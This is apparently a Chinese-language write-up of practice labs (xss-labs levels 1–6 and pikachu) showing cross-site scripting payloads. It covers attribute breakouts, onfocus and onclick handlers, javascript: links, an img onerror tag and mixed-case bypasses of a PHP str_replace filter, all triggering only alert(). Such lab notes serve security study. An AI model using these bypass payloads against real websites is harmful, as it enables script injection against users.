level1

源码

image-20240229205534538

test的值是url name参数直接传进来的

1
name=<script>alert()</script>

level2

源码

image-20240229210657491

test的值也是用keyword参数直接插入进去,试试在url构造payload

1
keyword=<script>alert()</script>

显示以下东西

image-20240229210631428

查看源码

image-20240229210900571

第一个插入被转义了,但是第二个没有,因此对第二个构造payload

1
"> <script>alert()</script> <"

level3

插入

1
<script>alert()</script>

两个都被转义

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level4.php?keyword=try harder!";
}
</script>
<title>欢迎来到level3</title>
</head>
<body>
<h1 align=center>欢迎来到level3</h1>
<h2 align=center>没有找到和&lt;script&gt;alert()&lt;/script&gt;相关的结果.</h2><center>
<form action=level3.php method=GET>
<input name=keyword value='&lt;script&gt;alert()&lt;/script&gt;'>
<input type=submit name=submit value=搜索 />
</form>
</center><center><img src=level3.png></center>
<h3 align=center>payload的长度:24</h3></body>
</html>

作弊:看源码

htmlspecialchars函数只针对<>大于小于号进行html实体化

image-20240229213259085

onfocus()事件绕过

image-20240229213417443

onfocus事件在元素获得焦点时触发,最常与 为例,标签是有输入框的,简单来说,onfocus事件就是当输入框被点击的时候,就会触发myFunction()函数,然后我们再配合javascript伪协议来执行javascript代码

输入

1
' onfocus=javascript:alert() '

level4

插入

1
<script>alert()</script>

后显示源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level5.php?keyword=find a way out!";
}
</script>
<title>欢迎来到level4</title>
</head>
<body>
<h1 align=center>欢迎来到level4</h1>
<h2 align=center>没有找到和&lt;script&gt;alert()&lt;/script&gt;相关的结果.</h2><center>
<form action=level4.php method=GET>
<input name=keyword value="scriptalert()/script">
<input type=submit name=submit value=搜索 />
</form>
</center><center><img src=level4.png></center>
<h3 align=center>payload的长度:20</h3></body>
</html>

插入

1
" onfocus=javascript:alert() "

level5(a href标签)

源码

image-20240229215156493

插入

1
<script>alert()</script>

image-20240229215259804

全被转义

插入

1
" onfocus=javascript:alert() "

image-20240229215354885

可以发现,onfocus也被过滤掉

插入

1
"> <a href=javascript:alert()>xxx</a> <"

level6(大小写)

源码

image-20240229215823781

插入

1
" onfocus=javascript:alert() "

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level7.php?keyword=move up!";
}
</script>
<title>欢迎来到level6</title>
</head>
<body>
<h1 align=center>欢迎来到level6</h1>
<h2 align=center>没有找到和&quot; onfocus=javascript:alert() &quot;相关的结果.</h2><center>
<form action=level6.php method=GET>
<input name=keyword value="" o_nfocus=javascript:alert() "">
<input type=submit name=submit value=搜索 />
</form>
</center><center><img src=level6.png></center>
<h3 align=center>payload的长度:31</h3></body>
</html>

被过滤了,试试a href标签,插入

1
"> <a href=javascript:alert()>xxx</a> <"

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level7.php?keyword=move up!";
}
</script>
<title>欢迎来到level6</title>
</head>
<body>
<h1 align=center>欢迎来到level6</h1>
<h2 align=center>没有找到和&quot;&gt; &lt;a href=javascript:alert()&gt;xxx&lt;/a&gt; &lt;&quot;相关的结果.</h2><center>
<form action=level6.php method=GET>
<input name=keyword value=""> <a hr_ef=javascript:alert()>xxx</a> <"">
<input type=submit name=submit value=搜索 />
</form>
</center><center><img src=level6.png></center>
<h3 align=center>payload的长度:41</h3></body>
</html>

也被过滤掉,测试一下大小写,插入

1
OnFocus <sCriPt> <a hReF=javascript:alert()>

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level7.php?keyword=move up!";
}
</script>
<title>欢迎来到level6</title>
</head>
<body>
<h1 align=center>欢迎来到level6</h1>
<h2 align=center>没有找到和OnFocus &lt;sCriPt&gt; &lt;a hReF=javascript:alert()&gt;相关的结果.</h2><center>
<form action=level6.php method=GET>
<input name=keyword value="OnFocus <sCriPt> <a hReF=javascript:alert()>">
<input type=submit name=submit value=搜索 />
</form>
</center><center><img src=level6.png></center>
<h3 align=center>payload的长度:44</h3></body>
</html>

显示没有过滤,因此可以插入

1
2
3
"> <sCript>alert()</sCript> <"
" Onfocus=javascript:alert() "
"> <a hRef=javascript:alert()>x</a> <"

任意一个都可以

最后看一下逻辑源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level7.php?keyword=move up!";
}
</script>
<title>欢迎来到level6</title>
</head>
<body>
<h1 align=center>欢迎来到level6</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level6.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>
</body>
</html>

pikachu-Dom型xss

输入xss,查看源码

image-20240301143120918

image-20240301143249154

输入框中的内容赋值给了text,text又给了str参数,并进行了拼接

插入以下代码闭合

1
2
3
' onclick='alert(1)'>
或者
'><img src='' onerror='alert(1)'/>

pikachu-xss之过滤

插入

1
<script>alert(1)</script>

image-20240301150609039

又输入

1
script

image-20240301151529744

又输入

1
<script>

image-20240301151342673

所以过滤掉了